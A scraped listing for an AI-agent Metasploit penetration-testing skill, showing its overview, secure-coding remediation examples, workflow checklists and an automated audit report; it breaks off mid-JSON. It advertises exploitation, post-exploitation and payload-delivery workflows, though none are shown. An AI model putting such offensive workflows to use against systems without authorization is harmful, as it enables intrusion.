Metasploit Framework Penetration Testing Overview Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery. IMPORTANT : This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities. Quick Start Initialize Metasploit console and verify database connectivity: C…

, user_id):\n raise ValueError(\"Invalid user ID format\")\n\n# Use ORM query builders\nuser = User.query.filter_by(id=user_id).first()\n```\n\n**Step 4: Implement least privilege**\n- Database user should have minimum required permissions\n- Use read-only accounts for SELECT operations\n- Never use admin/root accounts for application queries\n\n### XSS Remediation\n\n**Step 1: Enable auto-escaping**\n- Most modern frameworks escape by default\n- Ensure auto-escaping is not disabled\n\n**Step 2: Use framework-specific safe methods**\n\n```javascript\n// React: Use JSX (auto-escapes)\n\u003cdiv>{userInput}\u003c/div>\n\n// Vue: Use template syntax (auto-escapes)\n\u003cdiv>{{ userInput }}\u003c/div>\n\n// Angular: Use property binding (auto-escapes)\n\u003cdiv [textContent]=\"userInput\">\u003c/div>\n```\n\n**Step 3: Sanitize when HTML is required**\n\n```javascript\nimport DOMPurify from 'dompurify';\n\n// Sanitize HTML content\nconst clean = DOMPurify.sanitize(userHTML, {\n ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],\n ALLOWED_ATTR: []\n});\n```\n\n**Step 4: Content Security Policy (CSP)**\n\n```html\n\u003c!-- Add CSP header -->\nContent-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'\n```\n\n---\n\n## Advanced Configuration\n\nThis section contains detailed configuration options and tuning parameters.\n\n### Example: SAST Tool Configuration\n\n```yaml\n# Advanced security scanner configuration\nscanner:\n # Severity threshold\n severity_threshold: MEDIUM\n\n # Rule configuration\n rules:\n enabled:\n - sql-injection\n - xss\n - hardcoded-secrets\n disabled:\n - informational-only\n\n # False positive reduction\n confidence_threshold: HIGH\n exclude_patterns:\n - \"*/test/*\"\n - \"*/tests/*\"\n - \"*/node_modules/*\"\n - \"*.test.js\"\n - \"*.spec.ts\"\n\n # Performance tuning\n max_file_size_kb: 2048\n timeout_seconds: 300\n parallel_jobs: 4\n\n # Output configuration\n output_format: json\n include_code_snippets: true\n max_snippet_lines: 10\n```\n\n---\n\n## Examples and Code Samples\n\nThis section provides comprehensive code examples for various scenarios.\n\n### Example 1: Secure API Authentication\n\n```python\n# Secure API key handling\nimport os\nfrom functools import wraps\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n# Load API key from environment (never hardcode)\nVALID_API_KEY = os.environ.get('API_KEY')\nif not VALID_API_KEY:\n raise ValueError(\"API_KEY environment variable not set\")\n\ndef require_api_key(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n api_key = request.headers.get('X-API-Key')\n\n if not api_key:\n return jsonify({'error': 'API key required'}), 401\n\n # Constant-time comparison to prevent timing attacks\n import hmac\n if not hmac.compare_digest(api_key, VALID_API_KEY):\n return jsonify({'error': 'Invalid API key'}), 403\n\n return f(*args, **kwargs)\n return decorated_function\n\[email protected]('/api/secure-endpoint')\n@require_api_key\ndef secure_endpoint():\n return jsonify({'message': 'Access granted'})\n```\n\n### Example 2: Secure Password Hashing\n\n```python\n# Secure password storage with bcrypt\nimport bcrypt\n\ndef hash_password(password: str) -> str:\n \"\"\"Hash a password using bcrypt.\"\"\"\n # Generate salt and hash password\n salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)\n hashed = bcrypt.hashpw(password.encode('utf-8'), salt)\n return hashed.decode('utf-8')\n\ndef verify_password(password: str, hashed: str) -> bool:\n \"\"\"Verify a password against a hash.\"\"\"\n return bcrypt.checkpw(\n password.encode('utf-8'),\n hashed.encode('utf-8')\n )\n\n# Usage\nstored_hash = hash_password(\"user_password\")\nis_valid = verify_password(\"user_password\", stored_hash) # True\n```\n\n### Example 3: Secure File Upload\n\n```python\n# Secure file upload with validation\nimport os\nimport magic\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}\nALLOWED_MIME_TYPES = {\n 'application/pdf',\n 'image/png',\n 'image/jpeg'\n}\nMAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB\n\ndef is_allowed_file(filename: str, file_content: bytes) -> bool:\n \"\"\"Validate file extension and MIME type.\"\"\"\n # Check extension\n if '.' not in filename:\n return False\n\n ext = filename.rsplit('.', 1)[1].lower()\n if ext not in ALLOWED_EXTENSIONS:\n return False\n\n # Check MIME type (prevent extension spoofing)\n mime = magic.from_buffer(file_content, mime=True)\n if mime not in ALLOWED_MIME_TYPES:\n return False\n\n return True\n\ndef handle_upload(file):\n \"\"\"Securely handle file upload.\"\"\"\n # Check file size\n file.seek(0, os.SEEK_END)\n size = file.tell()\n file.seek(0)\n\n if size > MAX_FILE_SIZE:\n raise ValueError(\"File too large\")\n\n # Read content for validation\n content = file.read()\n file.seek(0)\n\n # Validate file type\n if not is_allowed_file(file.filename, content):\n raise ValueError(\"Invalid file type\")\n\n # Sanitize filename\n filename = secure_filename(file.filename)\n\n # Generate unique filename to prevent overwrite attacks\n import uuid\n unique_filename = f\"{uuid.uuid4()}_{filename}\"\n\n # Save to secure location (outside web root)\n upload_path = os.path.join('/secure/uploads', unique_filename)\n file.save(upload_path)\n\n return unique_filename\n```\n\n---\n\n## Best Practices for Reference Documents\n\n1. **Start with \"When to use\"** - Help Claude know when to load this reference\n2. **Include table of contents** - For documents >100 lines\n3. **Use concrete examples** - Code samples with vulnerable and fixed versions\n4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context\n5. **Provide remediation** - Don't just identify issues, show how to fix them\n6. **Organize logically** - Group related content, use clear headings\n7. **Keep examples current** - Use modern patterns and current framework versions\n8. **Be concise** - Even in references, challenge every sentence\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":15672,"content_sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f"},{"filename":"references/WORKFLOW_CHECKLIST.md","content":"# Workflow Checklist Template\n\nThis template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.\n\n## Pattern 1: Sequential Workflow Checklist\n\nUse this pattern for operations that must be completed in order, step-by-step.\n\n### Security Assessment Workflow\n\nProgress:\n[ ] 1. Identify application entry points and attack surface\n[ ] 2. Map authentication and authorization flows\n[ ] 3. Identify data flows and sensitive data handling\n[ ] 4. Review existing security controls\n[ ] 5. Document findings with framework references (OWASP, CWE)\n[ ] 6. Prioritize findings by severity (CVSS scores)\n[ ] 7. Generate report with remediation recommendations\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 2: Conditional Workflow\n\nUse this pattern when the workflow branches based on findings or conditions.\n\n### Vulnerability Remediation Workflow\n\n1. Identify vulnerability type\n - If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)\n - If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)\n - If Authentication flaw → See [auth-remediation.md](auth-remediation.md)\n - If Authorization flaw → See [authz-remediation.md](authz-remediation.md)\n - If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)\n\n2. Assess severity using CVSS calculator\n - If CVSS >= 9.0 → Priority: Critical (immediate action)\n - If CVSS 7.0-8.9 → Priority: High (action within 24h)\n - If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)\n - If CVSS \u003c 4.0 → Priority: Low (action within 30 days)\n\n3. Apply appropriate remediation pattern\n4. Validate fix with security testing\n5. Document changes and update security documentation\n\n---\n\n## Pattern 3: Iterative Workflow\n\nUse this pattern for operations that repeat across multiple targets or items.\n\n### Code Security Review Workflow\n\nFor each file in the review scope:\n1. Identify security-sensitive operations (auth, data access, crypto, input handling)\n2. Check against secure coding patterns for the language\n3. Flag potential vulnerabilities with severity rating\n4. Map findings to CWE and OWASP categories\n5. Suggest specific remediation approaches\n6. Document finding with code location and fix priority\n\nContinue until all files in scope have been reviewed.\n\n---\n\n## Pattern 4: Feedback Loop Workflow\n\nUse this pattern when validation and iteration are required.\n\n### Secure Configuration Generation Workflow\n\n1. Generate initial security configuration based on requirements\n2. Run validation script: `./scripts/validate_config.py config.yaml`\n3. Review validation output:\n - Note all errors (must fix)\n - Note all warnings (should fix)\n - Note all info items (consider)\n4. Fix identified issues in configuration\n5. Repeat steps 2-4 until validation passes with zero errors\n6. Review warnings and determine if they should be addressed\n7. Apply configuration once validation is clean\n\n**Validation Loop**: Run validator → Fix errors → Repeat until clean\n\n---\n\n## Pattern 5: Parallel Analysis Workflow\n\nUse this pattern when multiple independent analyses can run concurrently.\n\n### Comprehensive Security Scan Workflow\n\nRun these scans in parallel:\n\n**Static Analysis**:\n[ ] 1a. Run SAST scan (Semgrep/Bandit)\n[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)\n[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)\n[ ] 1d. Run license compliance check\n\n**Dynamic Analysis**:\n[ ] 2a. Run DAST scan (ZAP/Burp)\n[ ] 2b. Run API security testing\n[ ] 2c. Run authentication/authorization testing\n\n**Infrastructure Analysis**:\n[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)\n[ ] 3b. Run container image scan (Trivy/Grype)\n[ ] 3c. Run configuration review\n\n**Consolidation**:\n[ ] 4. Aggregate all findings\n[ ] 5. Deduplicate and correlate findings\n[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)\n[ ] 7. Generate unified security report\n\n---\n\n## Pattern 6: Research and Documentation Workflow\n\nUse this pattern for security research and documentation tasks.\n\n### Threat Modeling Workflow\n\nResearch Progress:\n[ ] 1. Identify system components and boundaries\n[ ] 2. Map data flows between components\n[ ] 3. Identify trust boundaries\n[ ] 4. Enumerate assets (data, services, credentials)\n[ ] 5. Apply STRIDE framework to each component:\n - Spoofing threats\n - Tampering threats\n - Repudiation threats\n - Information disclosure threats\n - Denial of service threats\n - Elevation of privilege threats\n[ ] 6. Map threats to MITRE ATT&CK techniques\n[ ] 7. Identify existing mitigations\n[ ] 8. Document residual risks\n[ ] 9. Recommend additional security controls\n[ ] 10. Generate threat model document\n\nWork through each step systematically. Check off completed items.\n\n---\n\n## Pattern 7: Compliance Validation Workflow\n\nUse this pattern for compliance checks against security standards.\n\n### Security Compliance Audit Workflow\n\n**SOC 2 Controls Review**:\n[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)\n[ ] 2. Verify logical access controls implementation (CC6.1)\n[ ] 3. Review authentication mechanisms (CC6.1)\n[ ] 4. Verify encryption implementation (CC6.1, CC6.7)\n[ ] 5. Review audit logging configuration (CC7.2)\n[ ] 6. Verify security monitoring (CC7.2, CC7.3)\n[ ] 7. Review incident response procedures (CC7.3, CC7.4)\n[ ] 8. Verify backup and recovery processes (A1.2, A1.3)\n\n**Evidence Collection**:\n[ ] 9. Collect policy documents\n[ ] 10. Collect configuration screenshots\n[ ] 11. Collect audit logs\n[ ] 12. Document control gaps\n[ ] 13. Generate compliance report\n\n---\n\n## Pattern 8: Incident Response Workflow\n\nUse this pattern for security incident handling.\n\n### Security Incident Response Workflow\n\n**Detection and Analysis**:\n[ ] 1. Confirm security incident (rule out false positive)\n[ ] 2. Determine incident severity (SEV1/2/3/4)\n[ ] 3. Identify affected systems and data\n[ ] 4. Preserve evidence (logs, memory dumps, network captures)\n\n**Containment**:\n[ ] 5. Isolate affected systems (network segmentation)\n[ ] 6. Disable compromised accounts\n[ ] 7. Block malicious indicators (IPs, domains, hashes)\n[ ] 8. Implement temporary compensating controls\n\n**Eradication**:\n[ ] 9. Identify root cause\n[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)\n[ ] 11. Patch vulnerabilities exploited\n[ ] 12. Reset compromised credentials\n\n**Recovery**:\n[ ] 13. Restore systems from clean backups (if needed)\n[ ] 14. Re-enable systems with monitoring\n[ ] 15. Verify system integrity\n[ ] 16. Resume normal operations\n\n**Post-Incident**:\n[ ] 17. Document incident timeline\n[ ] 18. Identify lessons learned\n[ ] 19. Update security controls to prevent recurrence\n[ ] 20. Update incident response procedures\n[ ] 21. Communicate with stakeholders\n\n---\n\n## Usage Guidelines\n\n### When to Use Workflow Checklists\n\n✅ **Use checklists for**:\n- Complex multi-step operations\n- Operations requiring specific order\n- Security assessments and audits\n- Incident response procedures\n- Compliance validation tasks\n\n❌ **Don't use checklists for**:\n- Simple single-step operations\n- Highly dynamic exploratory work\n- Operations that vary significantly each time\n\n### Adapting This Template\n\n1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file\n2. **Customize steps** to match your specific security tool or process\n3. **Add framework references** (OWASP, CWE, NIST) where applicable\n4. **Include tool-specific commands** for automation\n5. **Add decision points** where manual judgment is required\n\n### Checklist Best Practices\n\n- **Be specific**: \"Run semgrep --config=auto .\" not \"Scan the code\"\n- **Include success criteria**: \"Validation passes with 0 errors\"\n- **Reference standards**: Link to OWASP, CWE, NIST where relevant\n- **Show progress**: Checkbox format helps track completion\n- **Provide escape hatches**: \"If validation fails, see troubleshooting.md\"\n\n### Integration with Feedback Loops\n\nCombine checklists with validation scripts for maximum effectiveness:\n\n1. Create checklist for the workflow\n2. Provide validation script that checks quality\n3. Include \"run validator\" step in checklist\n4. Loop: Complete step → Validate → Fix issues → Re-validate\n\nThis pattern dramatically improves output quality through systematic validation.\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":8390,"content_sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f"},{"filename":"skill-report.json","content":"{\n \"schema_version\": \"2.0\",\n \"meta\": {\n \"generated_at\": \"2026-01-16T15:47:47.339Z\",\n \"slug\": \"agentsecops-pentest-metasploit\",\n \"source_url\": \"https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/offsec/pentest-metasploit\",\n \"source_ref\": \"main\",\n \"model\": \"claude\",\n \"analysis_version\": \"3.0.0\",\n \"source_type\": \"community\",\n \"content_hash\": \"3811ff195b0a5a8ff93b6a91824e91e9776f9df3188a0b271a8898b32b9bc38e\",\n \"tree_hash\": \"01c009edc6bef1d41c9228c0814cf3b4075572eb45ded2727328112c3044675d\"\n },\n \"skill\": {\n \"name\": \"pentest-metasploit\",\n \"description\": \"Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.\\n\",\n \"summary\": \"Penetration testing framework for exploit development, vulnerability validation, and authorized secu...\",\n \"icon\": \"🎯\",\n \"version\": \"0.1.0\",\n \"author\": \"AgentSecOps\",\n \"license\": \"MIT\",\n \"category\": \"offsec\",\n \"tags\": [\n \"pentest\",\n \"metasploit\",\n \"exploitation\",\n \"post-exploitation\",\n \"vulnerability-validation\",\n \"red-team\"\n ],\n \"supported_tools\": [\n \"claude\",\n \"codex\",\n \"claude-code\"\n ],\n \"risk_factors\": [\n \"external_commands\",\n \"network\",\n \"filesystem\",\n \"env_access\",\n \"scripts\"\n ]\n },\n \"security_audit\": {\n \"risk_level\": \"low\",\n \"is_blocked\": false,\n \"safe_to_publish\": true,\n \"summary\": \"This is a pure documentation skill providing Metasploit Framework guidance. Contains no executable code, scripts, or network operations. All static findings are false positives - the scanner detects security tool names and techniques in educational documentation that would only be dangerous if executed. The skill emphasizes legal compliance and authorization requirements throughout.\",\n \"risk_factor_evidence\": [\n {\n \"factor\": \"external_commands\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 298,\n \"line_end\": 298\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 301,\n \"line_end\": 301\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 304,\n \"line_end\": 304\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 307,\n \"line_end\": 307\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 310,\n \"line_end\": 310\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 134,\n \"line_end\": 134\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 250,\n \"line_end\": 250\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 291,\n \"line_end\": 291\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 54,\n \"line_end\": 74\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 74,\n \"line_end\": 95\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 95,\n \"line_end\": 108\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 108,\n \"line_end\": 111\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 111,\n \"line_end\": 118\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 118,\n \"line_end\": 122\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 122,\n \"line_end\": 129\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 129,\n \"line_end\": 135\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 135,\n \"line_end\": 151\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 151,\n \"line_end\": 154\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 154,\n \"line_end\": 162\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 162,\n \"line_end\": 296\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 296,\n \"line_end\": 306\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 306,\n \"line_end\": 309\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 309,\n \"line_end\": 318\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 318,\n \"line_end\": 333\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 333,\n \"line_end\": 342\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 342,\n \"line_end\": 346\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 346,\n \"line_end\": 354\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 354,\n \"line_end\": 358\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 358,\n \"line_end\": 361\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 361,\n \"line_end\": 371\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 371,\n \"line_end\": 404\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 404,\n \"line_end\": 414\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 414,\n \"line_end\": 447\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 447,\n \"line_end\": 451\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 451,\n \"line_end\": 472\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 472,\n \"line_end\": 476\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 476,\n \"line_end\": 537\n },\n {\n \"file\": \"references/WORKFLOW_CHECKLIST.md\",\n \"line_start\": 74,\n \"line_end\": 74\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 36,\n \"line_end\": 48\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 48,\n \"line_end\": 79\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 79,\n \"line_end\": 83\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 83,\n \"line_end\": 87\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 87,\n \"line_end\": 91\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 91,\n \"line_end\": 97\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 97,\n \"line_end\": 101\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 101,\n \"line_end\": 113\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 113,\n \"line_end\": 127\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 127,\n \"line_end\": 133\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 133,\n \"line_end\": 142\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 142,\n \"line_end\": 154\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 154,\n \"line_end\": 176\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 176,\n \"line_end\": 179\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 179,\n \"line_end\": 180\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 180,\n \"line_end\": 181\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 181,\n \"line_end\": 182\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 182,\n \"line_end\": 188\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 188,\n \"line_end\": 199\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 199,\n \"line_end\": 202\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 202,\n \"line_end\": 203\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 203,\n \"line_end\": 204\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 204,\n \"line_end\": 205\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 205,\n \"line_end\": 211\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 211,\n \"line_end\": 223\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 223,\n \"line_end\": 227\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 227,\n \"line_end\": 233\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 233,\n \"line_end\": 276\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 276,\n \"line_end\": 282\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 282,\n \"line_end\": 286\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 286,\n \"line_end\": 293\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 293,\n \"line_end\": 297\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 297,\n \"line_end\": 311\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 311,\n \"line_end\": 315\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 315,\n \"line_end\": 322\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 322,\n \"line_end\": 330\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 330,\n \"line_end\": 344\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 344,\n \"line_end\": 348\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 348,\n \"line_end\": 377\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 377,\n \"line_end\": 390\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 390,\n \"line_end\": 400\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 400,\n \"line_end\": 411\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 411,\n \"line_end\": 416\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 416,\n \"line_end\": 430\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 350,\n \"line_end\": 350\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 444,\n \"line_end\": 444\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 38,\n \"line_end\": 38\n }\n ]\n },\n {\n \"factor\": \"network\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 240,\n \"line_end\": 240\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 43,\n \"line_end\": 43\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 44,\n \"line_end\": 44\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 45,\n \"line_end\": 45\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 73,\n \"line_end\": 73\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 118,\n \"line_end\": 118\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 119,\n \"line_end\": 119\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 151,\n \"line_end\": 151\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 191,\n \"line_end\": 191\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 192,\n \"line_end\": 192\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 193,\n \"line_end\": 193\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 217,\n \"line_end\": 217\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 260,\n \"line_end\": 260\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 261,\n \"line_end\": 261\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 288,\n \"line_end\": 288\n },\n {\n \"file\": \"skill-report.json\",\n \"line_start\": 6,\n \"line_end\": 6\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 19,\n \"line_end\": 19\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 20,\n \"line_end\": 20\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 21,\n \"line_end\": 21\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 451,\n \"line_end\": 451\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 452,\n \"line_end\": 452\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 453,\n \"line_end\": 453\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 454,\n \"line_end\": 454\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 455,\n \"line_end\": 455\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 229,\n \"line_end\": 229\n },\n {\n \"file\": \"SKILL.md\",\n \"line_start\": 229,\n \"line_end\": 229\n }\n ]\n },\n {\n \"factor\": \"filesystem\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 323,\n \"line_end\": 323\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 323,\n \"line_end\": 323\n }\n ]\n },\n {\n \"factor\": \"env_access\",\n \"evidence\": [\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/ci-config-template.yml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 147,\n \"line_end\": 147\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 132,\n \"line_end\": 132\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 147,\n \"line_end\": 147\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 148,\n \"line_end\": 148\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 156,\n \"line_end\": 156\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 157,\n \"line_end\": 157\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 162,\n \"line_end\": 162\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 163,\n \"line_end\": 163\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 164,\n \"line_end\": 164\n },\n {\n \"file\": \"assets/rule-template.yaml\",\n \"line_start\": 165,\n \"line_end\": 165\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 423,\n \"line_end\": 423\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 424,\n \"line_end\": 424\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 425,\n \"line_end\": 425\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 427,\n \"line_end\": 427\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 430,\n \"line_end\": 430\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 432,\n \"line_end\": 432\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 437,\n \"line_end\": 437\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 437,\n \"line_end\": 437\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 444,\n \"line_end\": 444\n }\n ]\n },\n {\n \"factor\": \"scripts\",\n \"evidence\": [\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 138,\n \"line_end\": 138\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 137,\n \"line_end\": 137\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n 